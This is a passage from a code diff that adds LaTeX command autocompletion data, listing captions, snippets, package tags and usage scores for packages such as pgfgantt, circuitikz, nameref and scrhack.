0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfgantt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfgantt-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfgantt-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfgantt-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfgantt-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfgantt-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfgantt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfgantt-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfgantt-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfgantt-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfgantt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfgantt-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfgantt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfgantt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfgantt-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfgantt-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfgantt-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfgantt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfgantt-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfgantt-cmd', + score: 0.2864294797053033, + }, + ], + circuitikz: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'circuitikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'circuitikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'circuitikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'circuitikz-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'circuitikz-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'circuitikz-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'circuitikz-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'circuitikz-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'circuitikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'circuitikz-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'circuitikz-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'circuitikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'circuitikz-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'circuitikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'circuitikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'circuitikz-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'circuitikz-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'circuitikz-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'circuitikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'circuitikz-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'circuitikz-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'circuitikz-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'circuitikz-cmd', + score: 0.2864294797053033, + }, + ], + hypcap: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hypcap-cmd', + score: 0.008565354665444157, + }, + ], + 'scrlayer-scrpage': [ + { + caption: '\\lofoot{}', + snippet: '\\lofoot{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.00011911213812243537, + }, + { + caption: '\\rofoot{}', + snippet: '\\rofoot{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.00021082185485863327, + }, + { + caption: '\\clearpairofpagestyles', + snippet: '\\clearpairofpagestyles', + meta: 'scrlayer-scrpage-cmd', + score: 8.874602750594376e-5, + }, + { + caption: '\\ihead{}', + snippet: '\\ihead{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0004507603139230655, + }, + { + caption: '\\ihead[]{}', + snippet: '\\ihead[$1]{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0004507603139230655, + }, + { + caption: '\\cofoot{}', + snippet: '\\cofoot{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.00021082185485863327, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.013411641301057813, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrlayer-scrpage-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrlayer-scrpage-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\automark[]{}', + snippet: '\\automark[$1]{$2}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0006703031783997437, + }, + { + caption: '\\automark{}', + snippet: '\\automark{$1}', + meta: 'scrlayer-scrpage-cmd', + score: 0.0006703031783997437, + }, + { + caption: '\\pagemark', + snippet: '\\pagemark', + meta: 'scrlayer-scrpage-cmd', + score: 0.0017520841736604843, + }, + ], + amsgen: [ + { + caption: '\\do', + snippet: '\\do', + meta: 'amsgen-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsgen-cmd', + score: 0.0063276692758974925, + }, + ], + tipa: [ + { + caption: '\\textipa{}', + snippet: '\\textipa{$1}', + meta: 'tipa-cmd', + score: 0.0028202799587687334, + }, + ], + appendixnumberbeamer: [ + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'appendixnumberbeamer-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\inserttotalframenumber', + snippet: '\\inserttotalframenumber', + meta: 'appendixnumberbeamer-cmd', + score: 0.0008756113669543194, + }, + ], + totcount: [ + { + caption: '\\totvalue{}', + snippet: '\\totvalue{$1}', + meta: 'totcount-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\newtotcounter{}', + snippet: '\\newtotcounter{$1}', + meta: 'totcount-cmd', + score: 0.004398151085448998, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'totcount-cmd', + score: 0.00037306820619479756, + }, + ], + atbegshi: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'atbegshi-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'atbegshi-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'atbegshi-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'atbegshi-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'atbegshi-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'atbegshi-cmd', + score: 0.008565354665444157, + }, + ], + environ: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'environ-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'environ-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'environ-cmd', + score: 0.021170869458413965, + }, + ], + arydshln: [ + { + caption: '\\hdashline', + snippet: '\\hdashline', + meta: 'arydshln-cmd', + score: 3.1727559255976046e-5, + }, + { + caption: '\\arrayrulecolor{}', + snippet: '\\arrayrulecolor{$1}', + meta: 'arydshln-cmd', + score: 0.008538501902241319, + }, + { + caption: '\\arrayrulecolor[]{}', + snippet: '\\arrayrulecolor[$1]{$2}', + meta: 'arydshln-cmd', + score: 0.008538501902241319, + }, + { + caption: '\\hline', + snippet: '\\hline', + meta: 'arydshln-cmd', + score: 1.3209538327406387, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'arydshln-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\cline{}', + snippet: '\\cline{$1}', + meta: 'arydshln-cmd', + score: 0.07276573550543858, + }, + ], + fp: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fp-cmd', + score: 0.021170869458413965, + }, + ], + here: [ + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'here-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'here-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'here-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'here-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'here-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'here-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'here-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'here-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'here-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'here-cmd', + score: 0.0012745874472536625, + }, + ], + layout: [ + { + caption: '\\layout', + snippet: '\\layout', + meta: 'layout-cmd', + score: 0.0003951770756385293, + }, + { + caption: '\\layout{}', + snippet: '\\layout{$1}', + meta: 'layout-cmd', + score: 0.0003951770756385293, + }, + ], + multibib: [ + { + caption: '\\newcites{}{}', + snippet: '\\newcites{$1}{$2}', + meta: 'multibib-cmd', + score: 0.0024438508435048224, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'multibib-cmd', + score: 0.2659628337907604, + }, + ], + tgpagella: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgpagella-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgpagella-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgpagella-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgpagella-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgpagella-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgpagella-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgpagella-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgpagella-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgpagella-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgpagella-cmd', + score: 0.021170869458413965, + }, + ], + minitoc: [ + { + caption: '\\addstarredchapter{}', + snippet: '\\addstarredchapter{$1}', + meta: 'minitoc-cmd', + score: 0.0009796486230293261, + }, + { + caption: '\\minitoc', + snippet: '\\minitoc', + meta: 'minitoc-cmd', + score: 0.001626371504530358, + }, + { + caption: '\\dominitoc', + snippet: '\\dominitoc', + meta: 'minitoc-cmd', + score: 0.0006984399207241325, + }, + { + caption: '\\mtcaddchapter', + snippet: '\\mtcaddchapter', + meta: 'minitoc-cmd', + score: 9.045112044064169e-5, + }, + { + caption: '\\listoffigures', + snippet: '\\listoffigures', + meta: 'minitoc-cmd', + score: 0.03447318897846567, + }, + { + caption: '\\listoftables', + snippet: '\\listoftables', + meta: 'minitoc-cmd', + score: 0.02104656820469027, + }, + { + caption: '\\tableofcontents', + snippet: '\\tableofcontents', + meta: 'minitoc-cmd', + score: 0.13360595130994957, + }, + { + caption: '\\adjustmtc', + snippet: '\\adjustmtc', + meta: 'minitoc-cmd', + score: 0.00015075186740106945, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'minitoc-cmd', + score: 3.0952612541683835, + }, + ], + nameref: [ + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'nameref-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'nameref-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'nameref-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'nameref-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'nameref-cmd', + score: 1.897791904799601, + }, + { + caption: '\\thepage', + snippet: '\\thepage', + meta: 'nameref-cmd', + score: 0.0591555998103519, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nameref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nameref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'nameref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'nameref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'nameref-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nameref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'nameref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nameref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nameref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'nameref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nameref-cmd', + score: 0.008565354665444157, + }, + ], + ntheorem: [ + { + caption: '\\theoremclass{}', + snippet: '\\theoremclass{$1}', + meta: 'ntheorem-cmd', + score: 0.0001448542182198375, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'ntheorem-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'ntheorem-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\newshadedtheorem{}{}', + snippet: '\\newshadedtheorem{$1}{$2}', + meta: 'ntheorem-cmd', + score: 0.0001632850673327423, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'ntheorem-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'ntheorem-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'ntheorem-cmd', + score: 0.215689795055434, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'ntheorem-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'ntheorem-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'ntheorem-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'ntheorem-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'ntheorem-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'ntheorem-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'ntheorem-cmd', + score: 0.0018957469739775527, + }, + ], + tabto: [ + { + caption: '\\tab', + snippet: '\\tab', + meta: 'tabto-cmd', + score: 0.016398493343291305, + }, + { + caption: '\\tab{}', + snippet: '\\tab{$1}', + meta: 'tabto-cmd', + score: 0.016398493343291305, + }, + { + caption: '\\NumTabs{}', + snippet: '\\NumTabs{$1}', + meta: 'tabto-cmd', + score: 0.00011350525217178113, + }, + { + caption: '\\tabto{}{}', + snippet: '\\tabto{$1}{$2}', + meta: 'tabto-cmd', + score: 0.002119919034744357, + }, + { + caption: '\\tabto{}', + snippet: '\\tabto{$1}', + meta: 'tabto-cmd', + score: 0.002119919034744357, + }, + ], + emptypage: [ + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'emptypage-cmd', + score: 0.044016804142963585, + }, + ], + abntex2abrev: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'abntex2abrev-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'abntex2abrev-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'abntex2abrev-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'abntex2abrev-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'abntex2abrev-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'abntex2abrev-cmd', + score: 0.0018957469739775527, + }, + ], + scrhack: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrhack-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrhack-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'scrhack-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\xpatchcmd{}{}{}{}{}', + snippet: '\\xpatchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'scrhack-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\xpatchcmd', + snippet: '\\xpatchcmd', + meta: 'scrhack-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'scrhack-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'scrhack-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'scrhack-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'scrhack-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'scrhack-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'scrhack-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'scrhack-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'scrhack-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'scrhack-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'scrhack-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'scrhack-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'scrhack-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'scrhack-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'scrhack-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'scrhack-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'scrhack-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'scrhack-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'scrhack-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'scrhack-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'scrhack-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'scrhack-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'scrhack-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'scrhack-cmd', + score: 0.2864294797053033, + 